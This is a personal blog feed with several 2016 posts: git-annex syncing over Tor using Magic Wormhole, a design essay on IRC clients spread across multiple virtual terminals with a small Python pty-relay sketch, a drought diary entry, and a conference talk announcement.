When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor. With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friends' accounts, so it was easy to share with them. Exchanging long addresses is too hard. This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time. So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style. The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;) I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.
This work was made possible by all my supporters on Patreon.

27 December 2016

Joey Hess: multi-terminal applications

While learning about and configuring weechat this evening, I noticed a lot of complexity and unsatisfying tradeoffs related to its UI, its mouse support, and its built-in window system. Got to wondering what I'd do differently, if I wrote my own IRC client, to avoid those problems. The first thing I realized is, it is not a good idea to think about writing your own IRC client. Danger, Will Robinson.. So, let's generalize. This blog post is not about designing an IRC client, but about exploring simpler ways that something like an IRC client might handle its UI, and perhaps designing something general-purpose that could be used by someone else to build an IRC client, or be mashed up with an existing IRC client.

What any modern IRC client needs to do is display various channels to the user. Maybe more than one channel should be visible at a time in some kind of window, but often the user will have lots of available channels and only want to see a few of them at a time. So there needs to be an interface for picking which channel(s) to display, and if multiple windows are shown, for arranging the windows. Often that interface also indicates when there is activity on a channel. The most recent messages from the channel are displayed. There should be a way to scroll back to see messages that have already scrolled by. There needs to be an interface for sending a message to a channel. Finally, a list of users in the channel is often desired.

Modern IRC clients implement their own UI for channel display, windowing, channel selection, activity notification, scrollback, message entry, and user list. Even the IRC clients that run in a terminal include all of that. But how much of that do they need to implement, really?

Suppose the user has a tabbed window manager that can display virtual terminals. The terminals can set their title, and can indicate when there is activity in the terminal. Then an IRC client could just open a bunch of terminals, one per channel. Let the window manager handle channel selection, windowing (naturally), and activity notification. For scrollback, the IRC client can use the terminal's own scrollback buffer, so the terminal's regular scrollback interface can be used. This is slightly tricky; it can't use the terminal's alternate display, and it has to handle the UI for the message entry line at the bottom. That's all the UI an IRC client needs (except for the user list), and most of that is already implemented in the window manager and virtual terminal. So that's an elegant way to make an IRC client without building much new UI at all.

But, unfortunately, most of us don't use tabbed window managers (or tabbed terminals). Such an IRC client, in a non-tabbed window manager, would be a many-windowed mess. Even in a tabbed window manager, it might be annoying to have so many windows for one program. So we need fewer windows. Let's have one channel list window, and one channel display window. There could also be a user list window. And there could be a way to open additional, dedicated display windows for channels, but that's optional. All of these windows can be separate virtual terminals.

A potential problem: When changing the displayed channel, it needs to output a significant number of messages for that channel, so that the scrollback buffer gets populated. With a large number of lines, that can be too slow to feel snappy. In some tests, scrolling 10 thousand lines was noticeably slow, but scrolling 1 thousand lines happens fast enough not to be noticeable.
(Terminals should really be faster at scrolling than this, but they're still writing scrollback to unlinked temp files.. sigh!) An IRC client that uses multiple cooperating virtual terminals needs a way to start up a new virtual terminal displaying the current channel. It could run something like this:
x-terminal-emulator -e the-irc-client --display-current-channel
That would communicate with the main process via a unix socket to find out what to display. Or, more generally:
x-terminal-emulator -e connect-pty /dev/pts/9
connect-pty would simply connect a pty device to the terminal, relaying IO between them. The calling program would allocate the pty and do IO to it (a rough sketch of such a helper is at the end of this post). This may be too general to be optimal, though. For one thing, I think that most curses libraries have a singleton terminal baked into them, so it might be hard to have a single process control curses UIs on multiple pty's. And, it might be inefficient to feed that 1 thousand lines of scrollback through the pty and copy it to the terminal. Less general than that, but still general enough to not involve writing an IRC client, would be a library that handled the irc-client-like channel display, with messages scrolling up the terminal (and into the scrollback buffer), an input area at the bottom, and perhaps a few other fixed regions for status bars and etc. Oh, I already implemented that! In concurrent-output, over a year ago: a tiling region manager for the console. I wonder what other terminal applications could be simplified/improved by using multiple terminals? One that comes to mind is mutt, which has a folder list, a folder view, and an email view, that are all shoehorned, with some complexity, into a single terminal.
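Going back to connect-pty: a minimal sketch of what that helper might look like (in Python rather than C, ignoring window-size changes, error handling, and the niceties a real version would need):

#!/usr/bin/env python3
# connect-pty sketch: open an existing pty device (allocated by the main
# IRC-client process) and relay bytes between it and this terminal.
import os
import select
import sys
import termios
import tty

def relay(pty_path):
    fd = os.open(pty_path, os.O_RDWR | os.O_NOCTTY)
    stdin = sys.stdin.fileno()
    saved = termios.tcgetattr(stdin)
    tty.setraw(stdin)                      # pass keystrokes through unmodified
    try:
        while True:
            ready, _, _ = select.select([fd, stdin], [], [])
            if fd in ready:
                data = os.read(fd, 4096)
                if not data:
                    break                  # the other side closed the pty
                os.write(sys.stdout.fileno(), data)
            if stdin in ready:
                data = os.read(stdin, 4096)
                if not data:
                    break
                os.write(fd, data)
    finally:
        termios.tcsetattr(stdin, termios.TCSADRAIN, saved)

if __name__ == "__main__":
    relay(sys.argv[1])                     # e.g. connect-pty /dev/pts/9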

30 November 2016

Joey Hess: drought

Drought here since August. The small cistern ran dry a month ago, which has never happened before. The large cistern was down to some 900 gallons. I don't use anywhere near the national average of 400 gallons per day. More like 10 gallons. So I could have managed for a few more months. Still, this was worrying, especially as the area moved from severe to extreme drought according to the US Drought Monitor. Two days of solid rain fixed it, yay! The small cistern has already refilled, and the large will probably be full by tomorrow. The winds preceding that same rain storm fanned the flames that destroyed Gatlinburg. Earlier, fire got within 10 miles of here, although that may have been some kind of controlled burn. Climate change is leading to longer duration weather events in this area. What tended to be a couple of dry weeks in the fall has become multiple months of drought and weeks of fire. What might have been a few days of winter weather and a few inches of snow before the front moved through has turned into multiple weeks of arctic air, with multiple 1 ft snowfalls. What might have been a few scorching summer days has become a week of 100-110 degree temperatures. I've seen all that over the past several years. After this, I'm adding "additional, larger cistern" to my todo list. Also "larger fire break around house".

16 November 2016

Joey Hess: Linux.Conf.Au 2017 presentation on Propellor

On January 18th, I'll be presenting "Type driven configuration management with Propellor" at Linux.Conf.Au in Hobart, Tasmania (abstract). Linux.Conf.Au is a wonderful conference, and I'm thrilled to be able to attend it again. -- Update: My presentation on keysafe has also been accepted for the Security MiniConf at LCA, January 17th.
